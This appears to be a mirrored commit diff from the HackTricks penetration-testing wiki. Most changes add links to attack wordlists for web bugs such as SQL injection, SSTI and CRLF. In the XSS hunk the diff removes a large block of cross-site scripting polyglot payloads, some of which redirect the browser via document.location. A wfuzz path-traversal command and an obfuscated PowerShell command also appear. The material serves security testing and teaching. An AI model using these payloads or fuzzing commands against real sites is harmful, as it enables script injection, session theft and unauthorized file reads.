0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 10 pages modified

This commit is contained in:
CPol 2021-06-27 21:56:13 +00:00 committed by gitbook-bot
parent 87c5de72fa
commit aae0f909fe
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
10 changed files with 41 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
pentesting-web/client-side-template-injection-csti.md
View File

@ -71,5 +71,7 @@ javascript:alert(1)%252f%252f..%252fcss-images
**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)\*\*\*\*
\*\*\*\*
## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/ssti.txt" %}

4
pentesting-web/command-injection.md
View File

@ -120,6 +120,10 @@ powershell C:\*\*2\n??e*d.*? # notepad
{% page-ref page="../linux-unix/useful-linux-commands/bypass-bash-restrictions.md" %}
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/command\_injection.txt" %}
## References
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" %}

4
pentesting-web/crlf-0d-0a.md
View File

@ -179,6 +179,10 @@ The best prevention technique is to not use users input directly inside response
{% embed url="https://github.com/dwisiswant0/crlfuzz" %}
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt" %}
## References
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)\*\*\*\*

4
pentesting-web/dangling-markup-html-scriptless-injection.md
View File

@ -225,6 +225,10 @@ At the moment of this writing you need to enable the portal tag on Chrome in `ch
Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
## References
All the techniques presented here and more can view reviewed with more details in:

14
pentesting-web/file-inclusion/README.md
View File

@ -29,24 +29,18 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
Try also to change `/` for `\`
Try also to add `../../../../../`
If you want to test several depths of folders with some bypasses included you can use the list [https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt](https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt)
**TODO**
A list that uses several techniques to find the file /etc/password \(to check if the vulnerability exists\) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
Using theses lists and deleting repetitions I have created a new one:
Merging several lists I have created:
* [https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt](https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt)
* [https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/](https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal)
* [https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt](https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt)
* [http://awesomehackers.org/2018/05/11/path-traversal-cheat-sheet/](http://awesomehackers.org/2018/05/11/path-traversal-cheat-sheet/)
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../`

4
pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
View File

@ -123,3 +123,7 @@ Check the XSLT page:
* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/ssi\_esi.txt" %}

4
pentesting-web/sql-injection/README.md
View File

@ -476,3 +476,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/sqli.txt" %}

6
pentesting-web/ssti-server-side-template-injection/README.md
View File

@ -798,7 +798,11 @@ If you think it could be useful, read:
## Tools
* [https://github.com/epinna/tplmap](https://github.com/epinna/tplmap)
{% embed url="https://github.com/epinna/tplmap" %}
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/ssti.txt" %}
## Practice

4
pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md
View File

@ -397,6 +397,10 @@ version="1.0">
\(Example from [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls)\)
## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xslt.txt" %}
## **References**
* [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf)

32
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -818,33 +818,7 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
### Polyglots
```javascript
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
```
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xss\_polyglots.txt" %}
### Blind XSS payloads
@ -888,6 +862,10 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
### Brute-Force List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/xss.txt" %}
## XSS Abusing other vulnerabilities
### XSS to SSRF